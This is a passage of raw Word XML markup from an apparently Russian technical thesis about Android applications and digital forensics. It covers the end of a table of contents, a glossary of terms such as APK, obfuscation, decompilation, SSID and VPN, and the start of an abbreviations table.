            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505589 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>96</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90" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ Н</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505590 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="15"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505591" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ П</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505591 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="003F046F" w:rsidRDefault="0016468A" w:rsidP="003F046F">
          <w:pPr>
            <w:pStyle w:val="15"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10195"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="00E70973" w:rsidRDefault="00753BE3" w:rsidP="00E70973">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc61505518"/>
      <w:r w:rsidRPr="00E70973">
        <w:lastRenderedPageBreak/>
        <w:t>ТЕРМИНЫ И ОПРЕДЕЛЕНИЯ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В данной работе используются следующие термины:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="00B33563" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00B33563">
        <w:t xml:space="preserve">Вендор –  это физическое или юридическое лицо, которое поставляет </w:t>
      </w:r>
      <w:r>
        <w:t>(а также, возможно, и производящее</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33563">
        <w:t>) объединенные в одну торговую марку товары и услуги</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="00B33563" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00B33563">
        <w:t>Нейросеть – представляет собой частный случай методов распознавания образов, дискриминантного анализа, методов кластеризации и тому подобное.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00B33563">
        <w:t>Машинное обучение – класс методов искусственного интеллекта, характерной чертой которых является</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не прямое решение задачи, а обучение в процессе применения решений множества сходных задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>ПК – компьютер, предназначенный для постоянного размещения на столе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>APK – формат архивных исполняемых файлов-приложений для Android, и ряда других операционных систем, основанных на Android.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Форензика – компьютерная криминалистика. Прикладная наука о раскрытии преступлений, связанных с компьютерной информацией, об исследовании цифровых доказательств, методах поиска, получения и закрепления таких доказательств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Google Play – магазин приложений, а также игр, книг, музыки и фильмов от компании Google, позволяющий сторонним компаниям предлагать владельцам устройств с операционной системой Android устанавливать и приобретать различные приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Обфускация – запутывание кода.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rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Декомпиляция – процесс воссоздания исходного кода декомпилятором.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Дизассемблировоние – процесс восстановления ассемблерного кода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API – описание способов (набор классов, процедур, функций, структур </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>или констант), которыми одна компьютерная программа может взаимодействовать с другой программой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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753BE3" w:rsidRPr="007343EE" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> – комплекс программных средств, используемый программистами для разработки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007343EE" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> протокол при</w:t>
      </w:r>
      <w:r>
        <w:t>кладного уровня передачи данных</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> – криптографический протокол, который подразумевает более безопасную связь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> – текстовый формат обмена данными, основанный на JavaScript,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007343EE" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSID</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> – символьное название беспроводной точки доступа Wi-Fi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007343EE" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BSSID</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">адрес точки доступа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>физическое имя устройства</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007343EE" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007343EE">
        <w:t xml:space="preserve"> технология беспроводной локальной сети с устройствами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Клиент-серверная архитектура – </w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">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t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Логирование – запись данных о работе программы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Стек технологий – </w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t>это набор инструментов, применяющийся при работе в проектах и включа</w:t>
      </w:r>
      <w:r>
        <w:t>ющий языки программирования, фре</w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t>ймворки, системы управления базами данных, компиляторы и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007C15AF" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фреймворк – </w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t>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t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Прокси – </w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t>это сервер и анонимайзер особого вида, предс</w:t>
      </w:r>
      <w:r>
        <w:t>тавляющий собой веб-приложение,</w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t xml:space="preserve"> установленное на веб-сервере</w:t>
      </w:r>
      <w:r>
        <w:t>, выступающее в роли посредника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007C15AF" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t xml:space="preserve"> – виртуальная частная сеть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007C15AF" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Слабосвязность – </w:t>
      </w:r>
      <w:r w:rsidRPr="007C15AF">
        <w:t>способ и степень взаимозависимости между программными модулями</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, при котором система хорошо структурирована и облегчает понимание логики модулей, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D600A4">
        <w:t>их модификацию, автономное тестирование, а также переиспользование по отдельности</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="00753BE3" w:rsidP="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Развертование</w:t>
      </w:r>
      <w:r w:rsidRPr="00D600A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00D600A4">
        <w:t>это все действия, которые делают программную систему готовой к использованию</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00064AB5" w:rsidRDefault="00064AB5" w:rsidP="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Пагинация – порядковая нумерация страниц для сокращения объема данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00753BE3" w:rsidP="009D41FE">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc61505519"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПЕРЕЧЕНЬ СОКРАЩЕНИЕ И УСЛОВНЫХ ОБОЗНАЧЕНИЙ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="006E1540" w:rsidRDefault="006E1540" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В данной работе используются сокращения и условные обозначения, значения которых указаны в т</w:t>
      </w:r>
      <w:r w:rsidR="00D6635B">
        <w:t>аблице 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="005E3220" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 1 – С</w:t>
      </w:r>
      <w:r w:rsidR="000853C0">
        <w:t>окращения и условные обозначения</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4566"/>
        <w:gridCol w:w="4778"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016468A" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0016468A" w:rsidRDefault="0016468A" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Сокращение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0016468A" w:rsidRDefault="0016468A" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016468A" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0016468A" w:rsidRDefault="00B33563" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ОС</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0016468A" w:rsidRDefault="00B33563" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Операционная система</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487703" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00487703" w:rsidRDefault="00487703" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>МПУ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00487703" w:rsidRDefault="00487703" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Мобильное персональное устройство</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="00B33563" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ИТКС</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="00B33563" w:rsidP="00B33563">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Информационно-телекоммуникационная система</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="00B33563" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ПО</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="00B33563" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Программное обеспечение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="00DA6C27" w:rsidRDefault="00DA6C27" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>APK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="007343EE" w:rsidP="007343EE">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t xml:space="preserve">Android </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="007343EE">
              <w:t>ackage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="00DA6C27" w:rsidRDefault="00DA6C27" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="007343EE" w:rsidP="007343EE">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="007343EE">
              <w:t xml:space="preserve">pplication </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="007343EE">
              <w:t xml:space="preserve">rogramming </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="007343EE">
              <w:t>nterface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="002B77C4" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>БД</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="007343EE" w:rsidRDefault="007343EE" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>База данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
